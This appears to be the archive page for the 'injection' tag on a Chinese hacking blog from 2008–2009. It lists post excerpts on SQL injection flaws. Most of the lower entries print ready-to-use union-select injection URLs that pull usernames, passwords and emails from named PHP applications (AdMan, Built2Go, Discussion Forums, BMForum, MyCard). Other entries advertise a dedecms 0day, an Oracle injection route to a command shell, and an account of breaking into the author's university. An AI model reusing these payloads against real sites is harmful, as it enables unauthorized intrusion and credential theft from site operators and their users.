存档

文章标签 ‘注入’

浅析LxBlog V6变量未初始化漏洞

2009年3月20日 admin 没有评论

Lxblog 是一套基于 PHP+MySQL 数据库平台架构的多用户博客系统,拥有强大的个人主页系统、独立的二级域名体系、灵活的用户模板系统、丰富的朋友圈和相册功 能。但是该blog系统在安全性上并不让人满意,本文就来分析lxblog一个变量未初始化造成的sql注入漏洞。

分类: 脚本相关 标签: , , , ,

dedecms gbk版0day

2008年11月3日 admin 没有评论

貌似又是通过特殊符号绕开GBK的转换……漏洞文件:plus/infosearch.php,测试版本:5.1 gbk

分类: 脚本相关 标签: , , , ,

对本人学校X合大学的检测

2008年10月31日 admin 没有评论

讲述拿下X合大学的全过程.

分类: 入侵渗透, 我的作品, 胡说胡写, 脚本相关 标签: , , , , ,

Un Oracle注入笔记

2008年10月22日 admin 没有评论

这篇文章详细讲述了Oracle的手工注入方法。

分类: 入侵渗透, 脚本相关 标签: ,

犀利的 oracle 注入技术

2008年10月20日 admin 没有评论

介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。以下的演示都是在web上的sql plus执行的….

分类: 入侵渗透, 脚本相关 标签: ,

AdMan 1.1 存在SQL注入漏洞

2008年10月18日 admin 没有评论

源码下载:http://www.formfields.com/adManArea/adManPricing.php dork    利用方法: www.Spookzang.me/editCampaign.php?campaignId=-2′+union+select+concat(password,0x3a,username)+from+adman_users/*

分类: 脚本相关 标签: , , ,

Built2Go PHP RealEstate 存在SQL注入漏洞

2008年10月16日 admin 没有评论

利用方法:http://www.(spookzang).Net/event_detail.php?event_id=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*

分类: 脚本相关 标签: , , ,

Discussion Forums SQL注入漏洞

2008年10月4日 admin 没有评论

利用方法: http://www.spookzang.net/[installdir]/misc/RSS1.php?CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5,6,7+from+DF2k_Members/* 或者: http://www.spookzang.net/[installdir]/misc/RSS2.php?id=1&CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,user(),4,5,6,7,8,9,10+from+DF2k_Members/*

分类: 脚本相关 标签: , ,

BMForum 5.6 SQL注入漏洞!

2008年10月4日 admin 没有评论

利用方法: http://www.spookzang.net/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1′+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*

分类: 脚本相关 标签: , , ,

MyCard SQL注入漏洞!

2008年10月3日 admin 没有评论

源码下载:http://www.tufat.com/s_business_card_designer.htm 漏洞利用方法: http://www.spookzang.net/[path]/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/*

分类: 脚本相关 标签: , , ,